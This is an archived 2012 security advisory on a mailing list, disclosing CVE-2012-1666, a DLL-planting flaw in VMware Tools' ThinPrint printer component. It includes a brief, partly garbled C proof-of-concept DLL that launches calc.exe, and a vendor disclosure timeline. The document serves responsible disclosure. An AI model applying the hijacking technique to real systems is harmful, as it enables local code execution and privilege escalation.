lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 Sep 2012 15:43:14 GMT
Subject: VMWare Tools susceptible to binary planting by hijack

Security Advisory - VMWare Tools susceptible to binary planting by hijack
Summary           : VMWare Tools susceptible to binary planting
Date              : 4 September 2012
Affected versions : Product versions prior to -
					Workstation 8.0.4
					Player 4.0.4
					Fusion 4.1.2
					View 5.1
					ESX 5.0 P03
					ESX 4.1 U3
					Not affected: ESX 4.0, ESX 3.5
CVE reference     : CVE-2012-1666

VMWare Tools handles many functions involved with host-guest interactivity,
providing a richer environment for the end-user and server administrators alike.
Part of VMWare Tools responsibilities is handling printer services through host
and is called by a third-party acquired tool (ThinPrint).

During initiation, which occurs during many steps throughout printer comm.
negotiation, a non-existent dynamic-link library is called, resulting in an
unqualified dynamic-link library call to 'tpfc.dll'.

A user with local disk access can carefuly construct a DLL that suits the
pattern that is being traversed by the client and implement it somewhere along
the search path and the client will load it seamlessly.

After the DLL has been implemented, an unsuspected user that will run printer
services, for example, will cause it to load, resulting in arbitrary code
execution under user's privilege level.

This vector of attack is mainly used in a local privilege escalation scenarios,
user credential harvesting and can be used by malware to disguise itself,
amongst other uses.

Proof of Concept

	#include <windows.h> 

	int hijack_poc () 
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ; 
		 (	HINSTANCE hinstDLL , 
			DWORD dwReason ,
			LPVOID lpvReserved ) 
	  hijack_poc () ;
	  return 0 ;

Official patches were delivered by vendor and can be fetched from

The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.

4 September 2012
Security advisory released by Comsec Consulting
31 August 2012
Vendor finished on deploying fixes to products, release notes published
13 March 2012
Vendor started to implement fixes to products
14 February 2012
First response from vendor
13 February 2012
Bug reported by Moshe Zioni from Comsec Global Consulting
to VMWare and third-party printer driver developers in sync

Release notes

Comsec Global Consulting

Powered by blists - more mailing lists